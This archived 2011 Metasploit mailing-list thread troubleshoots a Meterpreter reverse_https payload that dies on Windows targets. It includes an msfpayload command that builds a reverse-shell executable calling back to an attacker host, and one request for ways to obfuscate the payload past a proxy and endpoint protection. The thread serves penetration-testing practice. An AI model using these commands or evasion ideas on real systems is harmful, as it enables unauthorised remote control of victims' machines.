Metasploit mailing list archives

Re: Meterpreter Reverse_HTTPS dies

From: Jerry <g.kassaras () googlemail com>
Date: Wed, 9 Mar 2011 18:48:58 +0200

It does ssl reverse proxy ....

Sent from my iPhone

On 9 Mar 2011, at 18:31, ricky-lee birtles <mr.r.birtles () gmail com>wrote:

https

Regards,
-- Mr R Birtles
On 9 March 2011 13:10, Gerasimos Kassaras<g.kassaras () googlemail com> wrote:
I am working on a project with Jhon Mystikopoulos and we are tryingto
pass a restrictive proxy web server any ideas about obfuscating the
payload?

So far I have tried:

1. Executables and failed (as expected)
2. VBS and failed (This time it failed on desktop)
On 9 March 2011 14:45, JOhn Mistikopoulos <mailtest1223133456 () gmail com> wrote:
I changed the ip of the listener from 0.0.0.0 to the real IP andworked.
Thanks everyone for the help!

-- John
On Sat, Mar 5, 2011 at 12:02 AM, Rob Fuller <mubix () room362 com>wrote:
try setting LHOST on the listener to the IP of the host instead of
0.0.0.0.
This is why I asked for a start to finish script. That way wearen't
shooting in the dark guessing what the problem might be.
Please copy from the point you make the binary to the point youpasted in
the original email, paste it to a paste bin, change your IP info to
something like 192.168.0.1 (attacker) and 192.168.0.2 (victim) sowe can
better assist you.

--
Rob Fuller | Mubix
Certified Checkbox Unchecker
Room362.com | Hak5.org


On Fri, Mar 4, 2011 at 9:28 AM, JOhn Mistikopoulos
<mailtest1223133456 () gmail com> wrote:
Yeah, reverse_tcp works great.
I have pasted the logs here:
http://mail.metasploit.com/pipermail/framework/2011-February/007516.html
Additionally, I 've created the payload with the followingcommand:msfpayload windows/meterpreter/reverse_https LHOST=x.x.x.xLPORT=443 X >
/tmp/https.exe
and started a multihandler listening at 0.0.0.0:443.
On Thu, Mar 3, 2011 at 6:03 PM, Rob Fuller <mubix () room362 com>wrote:
Does a different payload work? reverse_tcp for example. And
reverse_https doesn't use ActiveX so you shouldn't be seeing aiexplorer.exerunning unless of course if that's what you named your payload.It could be
a problem on your listener end.
Can you pastebin your process from start to finish? Whatexploit are you
running? Is it just a built binary?

--
Rob Fuller | Mubix
Certified Checkbox Unchecker
Room362.com | Hak5.org


On Thu, Mar 3, 2011 at 4:00 AM, JOhn Mistikopoulos
<mailtest1223133456 () gmail com> wrote:
I have tried numerous scenarios such as:
1. Middle proxy servers (more than 3 different web proxysoftware)
2. A single proxy server
3. No proxy server
4. Over the internet and locally (get the same error)
5. Tested with different service packs (WinXP SP1, SP3, Win7)
6. Tested with IE6, unpatched.
7. Tested with different user accounts and group policies.
8. Tested in Symantec and McAfee Endpoint protection (nonemarked it as
a threat)
9. Tested without any AV protection or Firewall-IPS.
When I run the payload (for example the "exe" file in anunprotected PC- no AV, no IPS) I got the its name on the task manager justfor a while and
then dies.
HoweverI don't see any instance of iexplorer.exe running.
On Wed, Mar 2, 2011 at 5:35 PM, HD Moore <hdm () metasploit com>wrote:
On 2/28/2011 6:13 AM, JOhn Mistikopoulos wrote:
And then, the listener stops giving any other info.
I went to the victim PC and realized that the payload exe had
already dies.
I couldn't see it on the task manager.
Concurrently, I had been running wireshark.
The two last packets were:
1. Victim => Listener (RST, ACK)
2. Listener => Victim (FIN, ACK)

Finally I don't get any connections.
Does anyone know how to fix this?
Is there any network proxy/filter between the target andyourself? Isthe target running an endpoint protection product or HIPS? Isthe
target
process a user-process (IE) or a system process (assuming
IE/user-land)?
The reverse_https payload is finicky based on the WinInetprofile of
the
user running the code.

-HD
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
--
Regards

Gerasimos Kassaras
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread:

Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Feb 28)
- Re: Meterpreter Reverse_HTTPS dies HD Moore (Mar 02)
  - Re: Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Mar 03)
    - Re: Meterpreter Reverse_HTTPS dies Rob Fuller (Mar 03)
    - Re: Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Mar 04)
    - Re: Meterpreter Reverse_HTTPS dies Rob Fuller (Mar 04)
    - Re: Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Mar 09)
    - Re: Meterpreter Reverse_HTTPS dies Gerasimos Kassaras (Mar 09)
    - Re: Meterpreter Reverse_HTTPS dies ricky-lee birtles (Mar 09)
    - Re: Meterpreter Reverse_HTTPS dies Jerry (Mar 09)
    - Re: Meterpreter Reverse_HTTPS dies c0lists (Mar 03)